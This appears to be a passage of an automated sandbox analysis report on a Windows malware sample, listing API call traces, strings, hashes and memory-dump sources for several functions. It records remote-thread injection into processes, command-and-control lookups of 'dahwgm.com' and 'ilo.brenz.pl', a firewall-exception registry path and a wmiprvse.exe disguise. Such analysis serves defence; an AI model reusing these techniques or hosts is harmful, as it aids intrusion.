Opcode Fuzzy Hash: 1fb8edccde2239dcf819b419ffd2f10b3402cd0bf8fe435dcda30660f774dccf
Instruction Fuzzy Hash: 1751A3B15043409FE310DB34C945B5BBAE4AFC4704F000A3EF69AA72D1E7B495058B5E

Function 006F388E Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 127networksleeptimeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(006F7584), ref: 006F389F
Sleep.KERNEL32(0000EA60), ref: 006F3911
gethostbyname.WS2_32(0D278125), ref: 006F396C
socket.WS2_32(00000002,00000001,00000000), ref: 006F3981
ioctlsocket.WS2_32(?,8004667E), ref: 006F399A
connect.WS2_32(?,?,00000010), ref: 006F39B3
Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 006F39C1
closesocket.WS2_32 ref: 006F3A20

Strings

dahwgm.com, xrefs: 006F38F1

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Sleep$SystemTimeclosesocketconnectgethostbynameioctlsocketsocket
String ID: dahwgm.com
API String ID: 2474828227-4111878103
Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction ID: 3f8560e37f41b1169ffa413409b900236450e9f1b64807606d27ab531247d85c
Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction Fuzzy Hash: 5F41B13160425DBAEB319E258C4EBE97B9FAF85710F044029FA49DE2C1D7F59F418B20

Function 0047676D Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 0047740B: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 0047742B

CloseHandle.KERNEL32(?), ref: 0047656E
FreeLibrary.KERNEL32(2DFEF72B,?,0047675C,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00476779
CloseHandle.KERNEL32(?,?,0047675C,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00476780
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 0047678A
Process32First.KERNEL32 ref: 0047679D
Process32Next.KERNEL32 ref: 004767AE
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 004767C6
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00476803
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 0047681E
CloseHandle.KERNEL32 ref: 0047682D

Strings

csrs, xrefs: 004767ED

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryNextOpenPrivilegesProcessRemoteSnapshotThreadTokenToolhelp32
String ID: csrs
API String ID: 931541398-2321902090
Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction ID: 4dbbaebd50a98f1d709f3ba35779d02a68b2b1df6c81aed282515aa3ed15899f
Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction Fuzzy Hash: 7B118230505205BBEB296F21CD49BFF3A6EEF44745F01802EF84D99141CAB88F019E6E

Function 7FE307B5 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 7FE313C1: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FE313D1
Part of subcall function 7FE313C1: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FE313E1

CloseHandle.KERNEL32(?), ref: 7FE305BC
FreeLibrary.KERNEL32(76DA0000,?,7FE307A4,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307C1
CloseHandle.KERNEL32(?,?,7FE307A4,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307C8
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000065A4,00000000,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE307D2
Process32First.KERNEL32 ref: 7FE307E5
Process32Next.KERNEL32 ref: 7FE307F6
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE3080E
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00002FC3,00000002,00000000), ref: 7FE3084B
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000065A4), ref: 7FE30866
CloseHandle.KERNEL32 ref: 7FE30875

Strings

csrs, xrefs: 7FE30835

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
String ID: csrs
API String ID: 3908997113-2321902090
Opcode ID: 7a0311b27d1f69206ae28c9acee774715fd69c7f810f3bbf34c027bcac111cc0
Instruction ID: eba08b2346753bb0dc32dc5381f4741ba834f7a00a5bae23cd1368a28801996b
Opcode Fuzzy Hash: 7a0311b27d1f69206ae28c9acee774715fd69c7f810f3bbf34c027bcac111cc0
Instruction Fuzzy Hash: 6D119830A0A215FBEB255F21CC4DBBE3A7DDF44745F510028FA4799080DBB0DB41C6A6

Function 00401660 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 157stringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 004016A7
strcspn.MSVCRT ref: 004016C4
strncpy.MSVCRT ref: 004016D3
strcspn.MSVCRT ref: 004016E3
atoi.MSVCRT(00000000), ref: 0040175F

Strings

L8@, xrefs: 00401769
:8@, xrefs: 0040178B
(8@, xrefs: 0040179A

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: strcspn$atoistrncpystrstr
String ID: (8@$:8@$L8@
API String ID: 896909712-67691562
Opcode ID: 74f2855ef3a0f674b5d1c88f69f431229b06cb2c14ad1b607f774191325958ff
Instruction ID: 423295b4073bef868c52a0da5d7697345aa104327ed5b96778bd2d0c64799647
Opcode Fuzzy Hash: 74f2855ef3a0f674b5d1c88f69f431229b06cb2c14ad1b607f774191325958ff
Instruction Fuzzy Hash: CA213931A002186BC710A778DD06BEA7765AF48714F0006BEFA5AF32C1DEB85A408B9D

Function 7FE332B8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 116libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE332AC), ref: 7FE332B8

Part of subcall function 7FE332CF: GetProcAddress.KERNEL32(00000000,7FE332C3), ref: 7FE332D0
Part of subcall function 7FE332CF: GetModuleFileNameA.KERNEL32(00000000,C:\Windows\sysWOW64\wbem\wmiprvse.exe,000000C8), ref: 7FE332E5
Part of subcall function 7FE332CF: wsprintfA.USER32 ref: 7FE332FA
Part of subcall function 7FE332CF: CreateThread.KERNEL32(00000000,00000000,7FE32C7D,00000000,00000000), ref: 7FE33343
Part of subcall function 7FE332CF: CloseHandle.KERNEL32(?,0C1A4F68), ref: 7FE3334C
Part of subcall function 7FE332CF: WSAStartup.WS2_32(00000101), ref: 7FE333D1
Part of subcall function 7FE332CF: Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
hell32.dll,-1, xrefs: 7FE3330E

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: AddressCloseCreateFileHandleLibraryLoadModuleNameProcSleepStartupThreadwsprintf
String ID: SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 1694642180-1583563992
Opcode ID: 8f19a037a4958f9c4e4be2aea23628189e7a365a9e4db52631885ff5fdbb2ecd
Instruction ID: 12527aadef34871a68a9f0f3636c4070517339c0fc18d64a5fb64a9bfd057a23
Opcode Fuzzy Hash: 8f19a037a4958f9c4e4be2aea23628189e7a365a9e4db52631885ff5fdbb2ecd
Instruction Fuzzy Hash: F031E471918715BFD7229A208C4EFEA366CDF41711F804219F85A9E081DAF46F06D6A5

Function 7FE33565 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84sleepnetworkstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE33412
lstrlen.KERNEL32(ilo.brenz.pl), ref: 7FE3341D
socket.WS2_32(00000002,00000001,00000000), ref: 7FE33453
connect.WS2_32(?,7FE32EB6,00000010), ref: 7FE3346D
GetVersionExA.KERNEL32(?,?,7FE32EB6,00000010), ref: 7FE334B7
wsprintfA.USER32 ref: 7FE33566
Sleep.KERNEL32(00000064,?,?,C:\Windows\sysWOW64\wbem\wmiprvse.exe,7FE36125,00000000,?,C:\Windows\sysWOW64\wbem\wmiprvse.exe,00000000,?,?,00000000), ref: 7FE33612
GetTickCount.KERNEL32 ref: 7FE3361B
closesocket.WS2_32 ref: 7FE3363F
Sleep.KERNEL32(00007530), ref: 7FE33653

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE33565, 7FE33570, 7FE33590

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID: Sleep$CountTickVersionclosesocketconnectgethostbynamelstrlensocketwsprintf
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe
API String ID: 2598339483-2345302899
Opcode ID: d8d5e14ce8bde0a1c939d63ec7781a2c4ff1cbe07d4ef513ca2b050a836d98cc
Instruction ID: d85bbd76be20f0a00c0cc1f3b58fd3048d72df3a51a8d270456399880643c19b
Opcode Fuzzy Hash: d8d5e14ce8bde0a1c939d63ec7781a2c4ff1cbe07d4ef513ca2b050a836d98cc
Instruction Fuzzy Hash: AC219171A04355BFEB259F24880DFAE3A7EEF41616F900504E80A9E194CBF0AB01DBA5

Function 00479F21 Relevance: 12.2, APIs: 8, Instructions: 215librarystringthreadCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00479F15), ref: 00479F21

Part of subcall function 00479F50: LoadLibraryA.KERNEL32(00479F44), ref: 00479F50
Part of subcall function 00479F50: CreateThread.KERNEL32(00000000,00000000,Function_00079849,00000000,00000000), ref: 00479FAA
Part of subcall function 00479F50: CloseHandle.KERNEL32(?,00000000), ref: 00479FB3
Part of subcall function 00479F50: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 00479FC0
Part of subcall function 00479F50: GetVersionExA.KERNEL32(?,?,00000000), ref: 0047A0BC

lstrlenA.KERNEL32(ilo.brenz.pl,?,00000000), ref: 0047A018
CreateThread.KERNEL32(00000000,00000000,Function_000797DA,6F6C6902,00000000), ref: 0047A175
CloseHandle.KERNEL32(?,00000000,6F6C6902,0047CA63,00000000,00000000), ref: 0047A17E
GetTickCount.KERNEL32 ref: 0047A1B7

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleLibraryLoadThread$CountEventTickVersionlstrlen
String ID:
API String ID: 2925003024-0
Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction ID: 06a4968b1ad2d7077f08583ce9da1dd58def7fa499b792a6610bdfce13f11c6a
Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction Fuzzy Hash: D081D071408248BEEB219F348C59BEE7BACEF41304F04855AE8599E2C2D6F85F45C76A

Function 00401CB5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110libraryfileCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?), ref: 00401C02
CloseHandle.KERNEL32(?), ref: 00401C3F
LoadLibraryA.KERNEL32(PlusCtrl.dll), ref: 00401C52
CreateFileA.KERNEL32(PlusCtrl.dll,40000000,00000001,00000000,00000002,00000000,00000000), ref: 00401CF9
CloseHandle.KERNEL32(00000000,?,00000000,00000000), ref: 00401D37

Strings

PlusCtrl.dll, xrefs: 00401C45, 00401CF4

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateFileLibraryLoad
String ID: PlusCtrl.dll
API String ID: 4073770061-3813448905
Opcode ID: c6c2baf483a5c7817c0615bf604dfdbf5b4d22fa498cde7f9790926ec1ef48c2
